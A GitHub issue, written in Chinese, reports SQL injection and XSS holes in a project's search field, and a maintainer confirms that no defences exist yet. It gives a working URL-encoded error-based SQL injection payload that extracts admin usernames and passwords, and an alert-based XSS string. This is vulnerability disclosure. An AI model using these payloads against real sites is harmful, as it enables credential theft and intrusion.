We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
在搜索处请求如下参数会产生SQL注入漏洞 a1%27%20and%20updatexml(2,concat(0x7e,(SELECT%20concat(username,%27=%27,password)%20FROM%20admin_user)),0)%23 如图 输入如下参数会产生XSS漏洞 ";alert(1);//
The text was updated successfully, but these errors were encountered:
谢谢您提出的问题~ 目前 SQL 注入和 XSS 攻击还没有做相应的防御措施
Sorry, something went wrong.
No branches or pull requests
在搜索处请求如下参数会产生SQL注入漏洞
![image](https://user-images.githubusercontent.com/55778895/67552938-acc2ee80-f73e-11e9-88f5-41291c20bfdf.png)
![image](https://user-images.githubusercontent.com/55778895/67553012-d4b25200-f73e-11e9-8cc9-aa3491c360bb.png)
a1%27%20and%20updatexml(2,concat(0x7e,(SELECT%20concat(username,%27=%27,password)%20FROM%20admin_user)),0)%23
如图
输入如下参数会产生XSS漏洞
";alert(1);//
The text was updated successfully, but these errors were encountered: